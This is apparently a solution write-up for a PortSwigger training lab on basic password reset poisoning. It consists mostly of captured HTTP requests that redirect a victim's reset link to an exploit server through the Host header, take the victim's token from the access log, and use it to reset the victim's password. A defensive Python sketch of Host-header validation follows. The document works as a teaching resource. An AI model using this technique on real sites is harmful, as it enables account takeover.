PortSwigger: Basic password reset poisoning
Solution
Log in on the login page as wiener
Login: wiener
Password: peter
Email: wiener@exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net
---
POST /login HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=ogMCgfuAoVjFkdZ8nV9yNlfTYeWFeIkV; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gD1JqGBohJMFyHgiDpxS2Oniu2cWR2aU&username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=8nLKZqY81EAdCcZp1viNA1TtjeGFpStz; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Change the password for user wiener
New password: qwerty123
---
GET /forgot-password HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /forgot-password HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/forgot-password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gh8Ap1yv3uBILuSdhvjmdn7h9RtANpGR&username=wiener%40exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net
---
GET /email HTTP/2
Host: exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /forgot-password?temp-forgot-password-token=sp1tawt6pxvs9desut8qc74ihsr9nl87 HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /forgot-password?temp-forgot-password-token=sp1tawt6pxvs9desut8qc74ihsr9nl87 HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/forgot-password?temp-forgot-password-token=sp1tawt6pxvs9desut8qc74ihsr9nl87
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gh8Ap1yv3uBILuSdhvjmdn7h9RtANpGR&temp-forgot-password-token=sp1tawt6pxvs9desut8qc74ihsr9nl87&new-password-1=qwerty123&new-password-2=qwerty123
---
POST /forgot-password HTTP/2
Host: hacked.mypage.com
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/forgot-password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gh8Ap1yv3uBILuSdhvjmdn7h9RtANpGR&username=wiener%40exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net
Request a password reset for user carlos
Change the Host header to the exploit server and the username to carlos
---
POST /forgot-password HTTP/2
Host: exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/forgot-password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gh8Ap1yv3uBILuSdhvjmdn7h9RtANpGR&username=carlos
Read the GET request in the exploit server access log
https://exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net/log
---
for user carlos
temp-forgot-password-token: c91x7oo2uw6uajaq2yxvv5fc4sy08iin
---
Request
10.0.3.121 2025-09-24 10:24:00 +0000 "GET /forgot-password?temp-forgot-password-token=c91x7oo2uw6uajaq2yxvv5fc4sy08iin HTTP/1.1" 404 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
Send the request to change the password for user carlos
Replace temp-forgot-password-token with the token for user carlos (from the previous step): c91x7oo2uw6uajaq2yxvv5fc4sy08iin
---
GET /forgot-password?temp-forgot-password-token=c91x7oo2uw6uajaq2yxvv5fc4sy08iin HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /forgot-password?temp-forgot-password-token=c91x7oo2uw6uajaq2yxvv5fc4sy08iin HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/forgot-password?temp-forgot-password-token=c91x7oo2uw6uajaq2yxvv5fc4sy08iin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gh8Ap1yv3uBILuSdhvjmdn7h9RtANpGR&temp-forgot-password-token=c91x7oo2uw6uajaq2yxvv5fc4sy08iin&new-password-1=Qwerty123&new-password-2=Qwerty123
Solved
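---
Added example (not part of the original write-up and not the lab's server code): the steps above work because the reset link is built from the request's Host header. The sketch below puts that pattern next to a hardened version that validates Host and builds the link from configuration only. CANONICAL_ORIGIN, ALLOWED_HOSTS, the function names and the shop.example / attacker.example hosts are assumptions made up for illustration.

```python
# Added illustration; all names and hosts are constructed, not taken from the lab.
from urllib.parse import urlencode

CANONICAL_ORIGIN = "https://shop.example"              # assumed: fixed in server config
ALLOWED_HOSTS = {"shop.example", "www.shop.example"}   # assumed allowlist of site names


def reset_link_vulnerable(host_header: str, token: str) -> str:
    """Poisonable pattern: the link's origin is whatever the client sent as Host."""
    query = urlencode({"temp-forgot-password-token": token})
    return f"https://{host_header}/forgot-password?{query}"


def normalize_host(host_header: str) -> str:
    """Lower-case the value, drop one optional :port and a trailing dot."""
    host = host_header.strip().lower()
    if host.startswith("["):
        return host  # IPv6 literal: left as-is, so it never matches the allowlist
    if ":" in host:
        host = host.rsplit(":", 1)[0]
    return host.rstrip(".")


def host_is_allowed(host_header: str) -> bool:
    """True only for names this site is actually served under."""
    return normalize_host(host_header) in ALLOWED_HOSTS


def reset_link_hardened(host_header: str, token: str) -> str:
    """Reject unexpected Host values, then build the link from configuration."""
    if not host_is_allowed(host_header):
        raise ValueError(f"unexpected Host header: {host_header!r}")
    query = urlencode({"temp-forgot-password-token": token})
    return f"{CANONICAL_ORIGIN}/forgot-password?{query}"
```

The same allowlist check applies to any override header the stack honours (for example X-Forwarded-Host); the emailed link should never depend on request data.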